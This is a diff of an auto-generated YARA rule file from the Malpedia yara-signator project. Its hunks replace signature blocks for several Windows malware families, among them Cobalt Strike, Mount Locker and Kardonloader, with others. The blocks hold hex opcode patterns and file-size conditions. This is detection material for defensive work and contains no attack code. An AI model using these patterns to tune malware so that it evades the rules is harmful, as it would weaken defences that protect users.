-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gemcutter_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megumin"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.megumin_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "9745c8061ab88116351043d55251d3e8c32737ca442027c8a6620480abc8c8bf"
+		logic_hash = "a365528e95f0493decec29de859395bb6581a0dddcbbf2af0b80b92938590fb4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -134970,32 +135490,32 @@ rule MALPEDIA_Win_Gemcutter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 889ea0314000 }
-		$sequence_1 = { 8d85f0fcffff 53 50 ffd6 8d85f0fcffff }
-		$sequence_2 = { 68???????? e8???????? 83c424 8b3d???????? 56 }
-		$sequence_3 = { 6a01 ff15???????? 6a01 68???????? e8???????? 6a01 }
-		$sequence_4 = { e8???????? 83c424 8b3d???????? 56 33f6 }
-		$sequence_5 = { 83c410 8d85f0fdffff 53 50 ffd6 8b3d???????? 8d85f0fdffff }
-		$sequence_6 = { 57 53 6801001f00 ff15???????? 3bc3 be???????? }
-		$sequence_7 = { 56 ff15???????? 8bf8 8d8500fcffff }
-		$sequence_8 = { fec8 8886a0314000 8a843579ffffff 46 ebea 395d08 }
-		$sequence_9 = { 6a00 6801001f00 ff15???????? 85c0 7517 68e8030000 ff15???????? }
+		$sequence_0 = { e8???????? 4f 83c404 33c9 ba10000000 83ff03 771a }
+		$sequence_1 = { 51 e8???????? 83c40c 8d4344 6803010000 ffb558feffff 6804010000 }
+		$sequence_2 = { 2bf9 8b8d88feffff 8bc2 2bc1 57 3bf8 7734 }
+		$sequence_3 = { 83fa38 57 0f43c1 8bce 50 }
+		$sequence_4 = { c745bc00000000 6a00 8d4db0 c645fc03 e8???????? 6a24 }
+		$sequence_5 = { 83ef01 75d9 6a40 8d4e01 57 51 }
+		$sequence_6 = { 0f85cf000000 83bd60ffffff10 8d8d4cffffff 8b955cffffff 0f438d4cffffff 6a04 68???????? }
+		$sequence_7 = { 84c0 7555 6a25 b9???????? }
+		$sequence_8 = { c74584ffffffff 6a64 8d4588 50 ff15???????? 8d7d88 }
+		$sequence_9 = { 6a00 ff15???????? 8d8df8f8ffff e8???????? 83781410 7202 8b00 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 1007616
 }
-rule MALPEDIA_Win_Gratem_Auto : FILE
+rule MALPEDIA_Win_Fakeword_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89f0dee2-28c6-5a10-a3ad-288a448f45ac"
+		id = "7169860f-e999-5507-9589-e70286203456"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gratem_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fakeword_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "b58ab0ade84c3286830362f0f11bfb9519b8733c76dfe4e9cd7ba24746663e50"
+		logic_hash = "76d399ff443db77ecdb848e572804a47dc4d5691a8ae699933905dad0bc0467f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135009,34 +135529,34 @@ rule MALPEDIA_Win_Gratem_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744242404000000 ffd5 85c0 0f84b2000000 }
-		$sequence_1 = { 884e13 66a1???????? 33c9 6685c0 741f 0fb7c0 ba000c0000 }
-		$sequence_2 = { ff15???????? 8b442414 50 ff15???????? 8b5c2410 56 }
-		$sequence_3 = { 85c0 7405 e8???????? 8b8c24d4070000 5e 33cc }
-		$sequence_4 = { 663bc2 0f84ac030000 0fb7048d64bc4000 41 }
-		$sequence_5 = { 8b4c2440 8b542418 894114 895110 }
-		$sequence_6 = { 6a00 50 e8???????? 83c40c 6805010000 8d4c2404 51 }
-		$sequence_7 = { 53 ff54244c 85c0 8b442414 }
-		$sequence_8 = { 0fb7c0 baa8540000 663bc2 0f8420050000 0fb7048d64bc4000 41 }
-		$sequence_9 = { 56 8d34c5c0b84000 833e00 7513 50 e8???????? }
+		$sequence_0 = { 50 68fa0f0000 57 55 ff15???????? 8b4c2410 }
+		$sequence_1 = { 85c9 7445 33c0 85c9 7623 8b3d???????? }
+		$sequence_2 = { 8b442408 56 57 8d7001 56 ff15???????? 85c0 }
+		$sequence_3 = { 85d2 7405 46 89742424 0fafce 6a40 6800100000 }
+		$sequence_4 = { e8???????? 8b0d???????? 83c40c 83c704 6a00 57 56 }
+		$sequence_5 = { 8b3d???????? 83c40c 68???????? 56 ffd7 8d54240c }
+		$sequence_6 = { 8b15???????? 892d???????? 3bd3 7f1a }
+		$sequence_7 = { 2bc7 3d20010000 7f0e 83f812 0f8e0d010000 ba01000000 89542440 }
+		$sequence_8 = { 5b 83c44c c3 56 57 6a00 e8???????? }
+		$sequence_9 = { ffd6 8d8c2418010000 68???????? 51 ffd6 893d???????? 8b03 }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
+rule MALPEDIA_Win_Windealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1adbbac8-6bfc-5d06-9cad-1cba809f72a0"
+		id = "87b31818-e67b-5c82-9927-08d581ce1fca"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cobalt_strike_auto.yar#L1-L236"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.windealer_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "516cb9bee5b249c5388cc4f59266e6454e546903dcdda98af8bfbaa75e737812"
+		logic_hash = "cda4114916f5f955b9ea27c4701626023386bb93ae37a566cf799b5d0e98aca8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -135048,46 +135568,32 @@ rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? eb0a b801000000 e9???????? }
-		$sequence_1 = { 3bc7 750d ff15???????? 3d33270000 }
-		$sequence_2 = { ff30 4f ff15???????? 83c604 8b06 }
-		$sequence_3 = { ff30 8b35???????? e8???????? eb17 }
-		$sequence_4 = { eb0b 391f 7504 83670400 8b7f20 85ff 75f1 }
-		$sequence_5 = { eb0b 8b45d4 83c010 8945d4 eb84 e9???????? }
-		$sequence_6 = { e8???????? 8bf8 59 59 85ff 7408 ff36 }
-		$sequence_7 = { e8???????? ff75fc ff15???????? 03fe 2bf8 57 ff75fc }
-		$sequence_8 = { ff15???????? 85c0 741d ff15???????? 85c0 }
-		$sequence_9 = { e9???????? 833d????????01 7505 e8???????? }
-		$sequence_10 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
-		$sequence_11 = { 8bd0 e8???????? 85c0 7e0e }
-		$sequence_12 = { ffc3 413bdf 7cde 488b742428 8b85f0170000 }
-		$sequence_13 = { 81fe00000008 7607 e8???????? eb08 448bce e8???????? 8bd8 }
-		$sequence_14 = { e8???????? 85c0 743d ffc3 83fb20 }
-		$sequence_15 = { c744242003000000 ff15???????? 488903 4883f8ff 74b2 8364246000 }
-		$sequence_16 = { 817c2404fca45307 751d 488b442418 8b00 }
-		$sequence_17 = { 8b442450 4c8d4c2420 41b820000000 8bd0 488b4c2448 488b442440 }
-		$sequence_18 = { 8b4038 488b4c2430 482bc8 488bc1 4889442430 eb5c }
-		$sequence_19 = { c644246345 c644246478 c644246541 c644246600 c644244856 }
-		$sequence_20 = { 4863403c 4889442428 48837c242840 722f 48817c242800040000 7324 }
-		$sequence_21 = { 488d0481 4889442448 488b442448 8b00 488b8c2498000000 4803c8 488bc1 }
-		$sequence_22 = { 488b4c2458 488d440118 48890424 488b442458 0fb74006 }
-		$sequence_23 = { 488b1424 0fb712 6623d1 0fb7ca 0fb7c9 488b542408 }
+		$sequence_0 = { 6a01 50 56 e8???????? 83c410 8bc7 }
+		$sequence_1 = { ff15???????? 85c0 7407 50 ff15???????? 6a01 }
+		$sequence_2 = { 50 56 e8???????? 83c410 8b4618 }
+		$sequence_3 = { 6a00 ff15???????? 85c0 7407 50 ff15???????? 6a01 }
+		$sequence_4 = { 53 56 57 68da070000 }
+		$sequence_5 = { 668b91d2070000 8a89d0070000 52 51 }
+		$sequence_6 = { 8b4d08 668b91d2070000 8a89d0070000 52 51 }
+		$sequence_7 = { 6a04 50 6a04 68???????? 68???????? }
+		$sequence_8 = { 56 57 68da070000 e8???????? }
+		$sequence_9 = { 8b4d08 668b91d2070000 8a89d0070000 52 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Shapeshift_Auto : FILE
+rule MALPEDIA_Win_Grillmark_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cabcac9b-3338-5cbf-966e-320365499be9"
+		id = "f964c2f0-0000-5336-8c75-c1988fed5207"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shapeshift_auto.yar#L1-L95"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.grillmark_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "4f13648d24cba1b4262131ef571d4233f5b7db53468eba6e1303bec367f02718"
+		logic_hash = "3b34499d4c29c52da57dd97a7dde84f3954319d72fae7b0456cb1c1378f5429f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135101,30 +135607,32 @@ rule MALPEDIA_Win_Shapeshift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fbf05???????? 0fb680589a4100 884204 0fbf05???????? 0fb680589a4100 }
-		$sequence_1 = { 8bf8 83c404 b9???????? bb02000000 }
-		$sequence_2 = { 8bf0 85f6 74b3 803d????????01 }
-		$sequence_3 = { ffd7 51 8d85f8feffff 50 ff15???????? }
-		$sequence_4 = { e8???????? 8904bd38054200 85c0 7514 }
-		$sequence_5 = { 33d2 b93b110f00 f7f1 68???????? }
-		$sequence_6 = { 0f44f8 8d85fcfdffff 50 e8???????? 83c40c }
-		$sequence_7 = { ff15???????? 68???????? 6a00 ff15???????? 8bf0 ff15???????? }
+		$sequence_0 = { 53 50 68???????? ff35???????? 56 e8???????? 68???????? }
+		$sequence_1 = { 40 83c104 ebf5 5d c3 55 8bec }
+		$sequence_2 = { e8???????? a3???????? ff35???????? 8d85e4fdffff 68???????? 50 e8???????? }
+		$sequence_3 = { 50 ffb604010000 56 e8???????? }
+		$sequence_4 = { e8???????? 59 85c0 59 0f85a4000000 682c020000 6a40 }
+		$sequence_5 = { 56 ff750c e8???????? 83c40c 6a01 5b }
+		$sequence_6 = { 59 75f2 ff7508 eb03 ff75f4 e8???????? 59 }
+		$sequence_7 = { 7439 48 7579 68???????? }
+		$sequence_8 = { 7405 83f86f 7532 ff75fc e8???????? 8bf0 59 }
+		$sequence_9 = { 802600 5f 8908 8b45f8 5e }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Catchamas_Auto : FILE
+rule MALPEDIA_Win_Ransoc_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "169e4746-2f72-5821-b507-b8a47f5cbc09"
+		id = "c55d5df4-572b-5c0c-9b0c-3a567923b39b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.catchamas_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ransoc_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "23c971887be94861d8baba1aeb0cd2edf205b86ca05876ee11e3ee91d8d84d51"
+		logic_hash = "9e4916ca4af80e938f133184e5caea93df6c13b83aeab910e5de3e08f2b95d7e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135138,32 +135646,32 @@ rule MALPEDIA_Win_Catchamas_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d5c2438 e8???????? 50 ff15???????? 56 6a00 ff15???????? }
-		$sequence_1 = { e8???????? 889c243c010000 8b442428 83c0f0 8d500c }
-		$sequence_2 = { 7c86 5e 5d 57 ff15???????? ff15???????? 5f }
-		$sequence_3 = { 53 ff15???????? b92a000000 be???????? 8d7c2418 f3a5 }
-		$sequence_4 = { 8bff baba000000 663bf2 720a bac0000000 663bf2 760c }
-		$sequence_5 = { 6a01 8d4c2420 50 8944241c }
-		$sequence_6 = { 8b8c2404080000 33cc e8???????? 81c408080000 c3 8d44240c 8bd0 }
-		$sequence_7 = { 53 ff15???????? 33c0 5f 5e 5b 8b8c24c8010000 }
-		$sequence_8 = { c3 8d44240c 8bd0 2bf2 8a08 880c06 }
-		$sequence_9 = { e8???????? 8b35???????? 8b4c2418 833900 0f855d050000 8bd1 }
+		$sequence_0 = { 85c0 7478 8bd7 8d4c2430 2bd0 3bf9 }
+		$sequence_1 = { 85d2 7403 894238 85c0 7415 397030 7508 }
+		$sequence_2 = { 895038 8bd0 8bc7 8bfa 89583c }
+		$sequence_3 = { 5e 895004 8b542428 5d 894808 5b }
+		$sequence_4 = { 8b742414 8916 894234 895038 8bd0 8bc7 8bfa }
+		$sequence_5 = { 3b780c 7508 8b7910 3b7810 7f2c 3bd6 }
+		$sequence_6 = { 8b5034 895134 8b4834 85c9 7406 8b5030 895130 }
+		$sequence_7 = { 0f8434020000 8b4830 3bca 7571 }
+		$sequence_8 = { 8b4e2c 751b f6c101 7516 }
+		$sequence_9 = { 895134 8b4834 85c9 7406 8b5030 895130 8b482c }
 
 	condition:
-		7 of them and filesize < 368640
+		7 of them and filesize < 958464
 }
-rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
+rule MALPEDIA_Win_Mount_Locker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "991ba939-2d9f-52cd-813d-6925dfb8d9c9"
+		id = "2ef861fc-00f6-570d-889b-9134868ef5a0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gold_dragon_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mount_locker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mount_locker_auto.yar#L1-L163"
 		license_url = "N/A"
-		logic_hash = "1d3ddf008eb509566d50c074a1778063d25aa540d5f914350cb60f472b9c159b"
+		logic_hash = "7b77b6c0c433631050c62ceb54745fc365be8fc933570e0c4c919105bbc01b03"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135177,73 +135685,79 @@ rule MALPEDIA_Win_Gold_Dragon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8890e0924000 eb1c f6c202 7410 8088????????20 8a9405ecfcffff }
-		$sequence_1 = { 8bc8 83e01f c1f905 8d04c0 8b0c8d00954000 8d44810c 50 }
-		$sequence_2 = { 85c0 a3???????? 0f84ad060000 8b35???????? 68???????? }
-		$sequence_3 = { 8bf1 8bc1 c1fe05 83e01f 8b34b500954000 8d04c0 8b0486 }
-		$sequence_4 = { 41 8079ff00 0f8547ffffff 8bc6 8088e193400008 }
-		$sequence_5 = { 8d8560ffffff 68???????? 50 e8???????? ffb64c834000 8d8560ffffff 50 }
-		$sequence_6 = { 51 ffd6 85c0 a3???????? 0f84dd030000 8b15???????? }
-		$sequence_7 = { 50 ffd6 85c0 a3???????? 0f8478060000 }
-		$sequence_8 = { 83e01f 8b0c8d00954000 8d04c0 8d0481 8b4dfc }
-		$sequence_9 = { 68???????? 50 ffd6 85c0 a3???????? 0f84d8050000 8b0d???????? }
+		$sequence_0 = { 498be8 4d8bc8 4c8bc2 4c8bf2 }
+		$sequence_1 = { f30f5905???????? 0f5ad0 66490f7ed0 e8???????? }
+		$sequence_2 = { 488b0b 41b902000000 4533c0 33d2 }
+		$sequence_3 = { 4533c9 488b4c2458 33d2 c744243001000000 }
+		$sequence_4 = { 4c8bc2 4c8bf2 8bf1 33d2 }
+		$sequence_5 = { 488d4df0 4889442428 4533c9 4533c0 }
+		$sequence_6 = { 8bc8 81e10000ffff 81f900000780 7503 0fb7c0 }
+		$sequence_7 = { 4c8b05???????? 488bcb 488b15???????? e8???????? 85c0 }
+		$sequence_8 = { 7505 e8???????? 833d????????00 7409 833d????????00 7505 e8???????? }
+		$sequence_9 = { ff15???????? 85c0 7509 f0ff05???????? }
+		$sequence_10 = { 415e 5f 5e c3 488bc4 48895010 4c894018 }
+		$sequence_11 = { 6a01 ff15???????? 8d4538 50 68???????? }
+		$sequence_12 = { 83ef01 75ec 6a20 59 8a06 884620 46 }
+		$sequence_13 = { 68???????? e8???????? 8d45c0 50 ff750c }
+		$sequence_14 = { 6815020100 6a08 83ceff ff15???????? 50 }
+		$sequence_15 = { 68???????? 6a01 e8???????? 83c40c 5e c3 56 }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 368640
 }
-rule MALPEDIA_Win_Unidentified_101_Auto : FILE
+rule MALPEDIA_Win_Cloudwizard_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc"
-		date = "2023-03-28"
-		modified = "2023-04-07"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_101_auto.yar#L1-L128"
+		id = "fa68961f-75e7-584f-a390-9baec9fbd3c5"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudwizard"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudwizard_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843"
+		logic_hash = "b90f140d158cbf9ceed90cefa4231cadc7a59a82c187cabca82f362a5d65baf4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230328"
-		malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d"
-		malpedia_version = "20230407"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f }
-		$sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 }
-		$sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 }
-		$sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 }
-		$sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 }
-		$sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 }
-		$sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 }
-		$sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? }
-		$sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 }
-		$sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e }
+		$sequence_0 = { 740b c700???????? 897004 eb02 33c0 8945ec 8365fc00 }
+		$sequence_1 = { d1f8 51 8d844618060000 50 e8???????? bf???????? 8bc7 }
+		$sequence_2 = { c645c74d c645c846 c645c95c c645ca7e c645cb49 c645cc5a }
+		$sequence_3 = { 668945d6 58 6a49 668945d8 58 6a18 668945da }
+		$sequence_4 = { 8983240e0000 5b c9 c20400 55 }
+		$sequence_5 = { 663930 75f5 8d45e8 50 }
+		$sequence_6 = { 668945f0 58 668945f2 6a47 58 668945f4 6a46 }
+		$sequence_7 = { 40 40 66833800 75f4 }
+		$sequence_8 = { 7506 56 e8???????? 6860ea0000 ff15???????? 837e3000 }
+		$sequence_9 = { 6685db 75f6 03c0 50 2bca 8d4560 }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 134144
 }
-rule MALPEDIA_Win_Mosquito_Auto : FILE
+rule MALPEDIA_Win_Newsreels_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "71ca1f1d-a29d-5919-908a-8739132906e6"
+		id = "596de4f5-9368-5129-8f10-46a814b9edc2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mosquito_auto.yar#L1-L196"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newsreels_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "69b344d7d3f2add25a4f6f1220ea429e517503872e1e485621e80a5c5693cfe3"
+		logic_hash = "31294f0bc1fd72fff816bb0c2c17d33dbab780b957e5c41520b825232208a7ae"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -135255,43 +135769,32 @@ rule MALPEDIA_Win_Mosquito_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3a5 ff942464020000 81c450020000 85c0 }
-		$sequence_1 = { 52 50 6a00 6801c1fd7d }
-		$sequence_2 = { f7d8 1bc0 83e0b4 83c04c }
-		$sequence_3 = { 8b10 8bc8 56 53 ff5204 e8???????? 57 }
-		$sequence_4 = { 8b00 33ff 57 6880000000 6a03 57 6a01 }
-		$sequence_5 = { b9cb410000 f7f9 6a20 69c27b6d0100 }
-		$sequence_6 = { 8b10 8bc8 57 6842730000 }
-		$sequence_7 = { 897702 e8???????? 8b45fc 83c410 897842 5f }
-		$sequence_8 = { e8???????? 6a20 8bf0 e8???????? 8bc8 }
-		$sequence_9 = { 8bfc f3a5 ff942460020000 81c450020000 }
-		$sequence_10 = { 0000 0001 1001 c550f0 8b8078005900 }
-		$sequence_11 = { ff15???????? 6a00 56 ff15???????? 8903 }
-		$sequence_12 = { 0000 006301 1000 7500 }
-		$sequence_13 = { 0000 00645657 8b7dc2 0400 }
-		$sequence_14 = { 0000 0032 08804d086440 5e }
-		$sequence_15 = { e8???????? 6a20 8bd8 e8???????? 8bc8 }
-		$sequence_16 = { 0000 006500 676c 0010 }
-		$sequence_17 = { 0000 00748078 3001 40 }
-		$sequence_18 = { 0000 0018 a0???????? 57 }
-		$sequence_19 = { e8???????? 83c40c e8???????? 6a20 }
-		$sequence_20 = { 6f 00e8 108d8b060400 8b4589 45 8b54000b 0002 }
+		$sequence_0 = { 895144 8bc2 8a542404 88540848 8b4144 }
+		$sequence_1 = { 33c0 5b 81c40c050000 c3 8d4c2418 51 6804010000 }
+		$sequence_2 = { c6043000 5e 5d 5b 81c4a0010000 c3 }
+		$sequence_3 = { 8d542428 52 89442430 e8???????? 8d442474 }
+		$sequence_4 = { 53 e8???????? 83c414 3bf5 75a4 }
+		$sequence_5 = { 8d7048 8ad1 57 8b7804 8816 8b5010 41 }
+		$sequence_6 = { 3d???????? 8a143a 88540c07 7cec b910000000 }
+		$sequence_7 = { ffd6 85c0 0f84c1000000 8b3d???????? 53 8d442424 }
+		$sequence_8 = { 8b742410 33c0 8ada 8ac8 }
+		$sequence_9 = { 56 8bf1 8b4e18 8b5614 }
 
 	condition:
-		7 of them and filesize < 1015808
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
+rule MALPEDIA_Win_Kardonloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d95bc7c2-314b-5852-896f-2ab463620583"
+		id = "1fc9d8e7-57f1-59f6-8755-7f22512ea4b8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermeticwizard"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hermeticwizard_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kardonloader_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a04b957d824c192d4445e19ff2c64beb34502a356441d2497a3f568d12cc4736"
+		logic_hash = "af6ba3e21c382f2fd654060dcfde8b3eb16b50330472c81358760501218ffed8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -135305,32 +135808,32 @@ rule MALPEDIA_Win_Hermeticwizard_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a87c0d10110 08441619 42 0fb64101 3bd0 }
-		$sequence_1 = { 33c0 eb11 ff37 ff15???????? 50 ff37 ff15???????? }
-		$sequence_2 = { 75e7 8b4d08 8d45e4 50 e8???????? 3b30 }
-		$sequence_3 = { 8bec 83ec14 56 8bf1 837e0400 }
-		$sequence_4 = { 85c0 0f95c2 85c0 74dd }
-		$sequence_5 = { 5d c3 55 8bec 3bca 7452 56 }
-		$sequence_6 = { 8bcb 52 ff33 e8???????? 8b5508 8b12 895508 }
-		$sequence_7 = { 7410 68???????? 8bce e8???????? 59 894304 }
-		$sequence_8 = { 66898d76ffffff 59 6a20 66898d78ffffff }
-		$sequence_9 = { 50 8d4dac e8???????? 8b4dc4 }
+		$sequence_0 = { 8975f8 e8???????? 84c0 ba???????? b9???????? 8d857cffffff 0f44ca }
+		$sequence_1 = { 57 ff15???????? 8bf0 83feff 0f849d000000 8d45e0 }
+		$sequence_2 = { c745f8???????? c745fc???????? ff74b5d8 ff15???????? }
+		$sequence_3 = { 59 59 85c0 0f84f7010000 56 57 }
+		$sequence_4 = { 7861 ff7510 ff7510 e8???????? 59 50 }
+		$sequence_5 = { 83c40c 894714 b001 5f 5e }
+		$sequence_6 = { c3 55 8bec 81ec00040000 8d8500fcffff 56 ff35???????? }
+		$sequence_7 = { 33c0 e9???????? 33c0 53 8b5d08 }
+		$sequence_8 = { c745f8???????? c745fc???????? ff74b5d8 ff15???????? 85c0 750a }
+		$sequence_9 = { 40 8945fc 894d08 8a01 }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Asruex_Auto : FILE
+rule MALPEDIA_Win_Corebot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "899abd0f-c835-5f70-819c-92570cc9b462"
+		id = "3997db80-c772-5b73-a963-36ab17758ace"
 		date = "2024-10-31"
